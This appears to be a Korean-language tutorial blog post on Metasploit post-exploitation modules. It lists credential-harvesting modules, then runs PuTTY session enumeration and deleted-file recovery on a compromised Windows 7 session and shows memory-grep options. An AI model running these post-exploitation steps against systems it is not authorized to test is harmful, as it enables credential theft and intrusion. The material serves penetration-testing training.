[MAD-METASPLOIT] 0x33 - Using post module

Post module 찾기

HAHWUL exploit(easyfilesharing_post) > search type:post platform:windows

Matching Modules

Name Disclosure Date Rank Description —- ————— —- ———– post/multi/gather/apple_ios_backup normal Windows Gather Apple iOS MobileSync Backup File Collection post/multi/gather/check_malware normal Multi Gather Malware Verifier post/multi/gather/dbvis_enum normal Multi Gather DbVisualizer Connections Settings post/multi/gather/dns_bruteforce normal Multi Gather DNS Forward Lookup Bruteforce post/multi/gather/dns_reverse_lookup normal Multi Gather DNS Reverse Lookup Scan post/multi/gather/dns_srv_lookup normal Multi Gather DNS Service Record Lookup Scan post/multi/gather/enum_vbox normal Multi Gather VirtualBox VM Enumeration post/multi/gather/env normal Multi Gather Generic Operating System Environment Settings post/multi/gather/filezilla_client_cred normal Multi Gather FileZilla FTP Client Credential Collection post/multi/gather/find_vmx normal Multi Gather VMWare VM Identification post/multi/gather/firefox_creds normal Multi Gather Firefox Signon Credential Collection post/multi/gather/jboss_gather normal Jboss Credential Collector post/multi/gather/lastpass_creds normal LastPass Vault Decryptor post/multi/gather/multi_command normal Multi Gather Run Shell Command Resource File post/multi/gather/pgpass_creds normal Multi Gather pgpass Credentials post/multi/gather/pidgin_cred normal Multi Gather Pidgin Instant Messenger Credential Collection post/multi/gather/ping_sweep normal Multi Gather Ping Sweep post/multi/gather/resolve_hosts normal Multi Gather Resolve Hosts post/multi/gather/run_console_rc_file normal Multi Gather Run Console Resource File post/multi/gather/skype_enum normal Multi Gather Skype User Data Enumeration post/multi/gather/thunderbird_creds …snip…

putty sessions 찾기

post/windows/gather/enum_putty_saved_sessions

HAHWUL exploit(easyfilesharing_post) > use post/windows/gather/enum_putty_saved_sessions HAHWUL post(enum_putty_saved_sessions) > show options

Module options (post/windows/gather/enum_putty_saved_sessions):

Name Current Setting Required Description —- ————— ——– ———– SESSION yes The session to run this module on.

HAHWUL post(enum_putty_saved_sessions) > run [-] Post failed: Msf::OptionValidateError The following options failed to validate: SESSION. HAHWUL post(enum_putty_saved_sessions) > set SESSION 2 SESSION => 2 HAHWUL post(enum_putty_saved_sessions) > run

[*] Looking for saved PuTTY sessions [-] No saved sessions found

[*] Looking for previously stored SSH host key fingerprints [-] No stored SSH host keys found

[] Looking for Pageant… [+] Pageant is running (Handle 0x0) [] Post module execution completed

post/windows/gather/forensics/browser_history normal Windows Gather Skype, Firefox, and Chrome Artifacts post/windows/gather/forensics/duqu_check normal Windows Gather Forensics Duqu Registry Check post/windows/gather/forensics/enum_drives normal Windows Gather Physical Drives and Logical Volumes post/windows/gather/forensics/imager normal Windows Gather Forensic Imaging post/windows/gather/forensics/nbd_server normal Windows Gather Local NBD Server post/windows/gather/forensics/recovery_files normal Windows Gather Deleted Files Enumeration and Recovering

파일 복구 관련 Module

HAHWUL post(driver_loader) > use post/windows/gather/forensics/recovery_files HAHWUL post(recovery_files) > show options

Module options (post/windows/gather/forensics/recovery_files):

Name Current Setting Required Description —- ————— ——– ———– DRIVE C: yes Drive you want to recover files from. FILES no ID or extensions of the files to recover in a comma separated way. Let empty to enumerate deleted files. SESSION yes The session to run this module on. TIMEOUT 3600 yes Search timeout. If 0 the module will go through the entire $MFT.

HAHWUL post(recovery_files) > set SESSION 2 SESSION => 2 HAHWUL post(recovery_files) > run

[] System Info - OS: Windows 7 (Build 7601, Service Pack 1)., Drive: C: [] $MFT is made up of 1 dataruns [*] Searching deleted files in data run 1 …

Memory grep

post/windows/gather/memory_grep

HAHWUL post(recovery_files) > use post/windows/gather/memory_grep HAHWUL post(memory_grep) > show options

Module options (post/windows/gather/memory_grep):

Name Current Setting Required Description —- ————— ——– ———– HEAP false no Grep from heap PROCESS yes Name of the process to dump memory from REGEX yes Regular expression to search for with in memory SESSION yes The session to run this module on.